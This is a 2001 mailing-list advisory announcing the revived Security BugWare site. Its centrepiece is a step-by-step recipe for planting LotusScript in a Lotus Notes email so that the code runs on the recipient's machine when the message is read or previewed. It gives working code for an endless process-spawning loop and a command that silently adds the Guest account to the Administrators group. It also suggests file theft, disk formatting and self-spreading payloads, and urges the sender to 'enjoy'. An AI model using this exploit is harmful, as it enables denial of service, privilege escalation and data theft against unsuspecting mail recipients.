Security BugWare Advisory

From: Yann (iribat_private)
Date: Mon Oct 22 2001 - 08:06:21 PDT

                        ----[www.securitybugware.org]----

                             < A D V I S O R I E S >

    Dear World,

    From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most  explicit  website
    about bugs, exploits, and solutions. He decided to stop this project.

    As there is no such resource on the web, we decided to keep this one alive.

    Behind the new Security BugWare you can find a french organisation (association
    loi 1901), which is a non-profit organisation. Our aim  is  to  continue Hrvoje
    job, for all people like us who need to have a centralised  -  and straight  to
    the point -  bug  information page.

    For the better propaganda of this news, we offer you  an  exclusive  "Trick  of
    the Trade" :

                   Whacking A Machine With Lotus Notes Mail

    COMMAND

        Lotus Notes Client

    SYSTEMS AFFECTED

        Lotus Notes Client 5 All releases Lotus Notes Client 4.6 All releases

    PROBLEM

        SecurityBugware team found following, as posted on www.securitybugware.org :

        With a little LotusScript in your mail, you can execute all what you want on
        the recipient's computer - even out of Notes.

        Follow these steps :

        1) Create a new mail, add recepients
        2) Go to the body and click in the menu "Create..Object"
        3) Select "Control" and any object you please such as "ActiveXPlugin Object"
        4) In Client 4.6 right click on the object to get "Properties"
           In Client 5 click on the menu the new "Applet" feature, and go to
           "Properties"
           then check "run the object when the document is read"
        5) Then select "Edit events" : An event pane opens linked to the object
        6) In the "Initialize" section Add the following code, where "My EMAIL"
           is your Lotus Notes account name (if you get this part wrong, you'll
           bomb yourself) :

                  Sub Initialize
                         Dim TaskId As Integer
                         Dim session As New NotesSession
                         If session.CommonUserName<>"My EMAIL" Then
                            Do
                                TaskId%=Shell("CALC.EXE",1)
                            Loop
                         End If
                  End Subv

        7) In the "Terminate" section, do the same :

                  Sub Terminate
                         Dim TaskId As Integer
                         Dim session As New NotesSession
                         If session.CommonUserName<>"My EMAIL" Then
                             Do
                                TaskId%=Shell("CALC.EXE",1)
                             Loop
                         End If
                  End Subv

        8) Click again on the "Initialize" section
        9) Hit the "Send" button, enjoy ;-)

        Your ActiveX (or other object you choosed) gets executed during the reading
        of the document. If the victim "previews" his mails without opening them...
        no problem, he will die anyway because a previsualisation is a reading.

        In this example we just run  the  calculator  in  loop,  but  there  can  be
        infinite  possibilities   like  formating   hard  drives,   sending  emails,
        replicating  the script to send it to the whole adressbook,  sending  files,
        stoling files from the victim hard drives without his notice etc...

        For instance you could replace the Do .. Loop by :

                  TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)

        which adds silentely account Guest to Administrative group

        In a few words, Lotus Intranet is a giant backdoor in itself.

        After some checks, it seems the smtp  gateway  don't  let  LotusScript  pass
        through. You can only play inside your Notes interconnected domains.

    SOLUTION

        The only solution is to desactivate the preview,  and  to  delete  the  memo
        before reading it.

    --
    Security Bugware Team
    Irib, Jitsu, Kiwi